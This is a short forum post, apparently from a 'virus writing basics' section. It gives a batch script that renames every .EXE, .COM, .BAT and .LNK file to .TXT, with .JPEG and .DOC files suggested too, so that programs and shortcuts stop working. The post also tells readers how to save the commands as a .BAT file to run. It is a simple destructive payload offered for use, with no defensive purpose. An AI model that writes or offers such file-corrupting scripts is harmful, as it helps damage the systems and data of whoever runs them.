Login Register






Don't ever ever open this batch file filter_list
Author
Message
Don't ever ever open this batch file #1
This is the virus writing basics section. Today we I'm going to show you to disable or corrupt files. This is demonstrated using batch programing/dos programing.

In order to corrupt files all that we do is change files to non-working TXT files or some other format.Evil

REN *.EXE *.TXT

REN *.COM *.TXT

REN *.BAT *.TXT

REN *.LNK *.TXT



Just copy the above code into a Notepad file and save it .BAT This is not it You can even change files to any other extension like:mad:
*.JPEG *.DOC
[Image: banner1.png]

Reply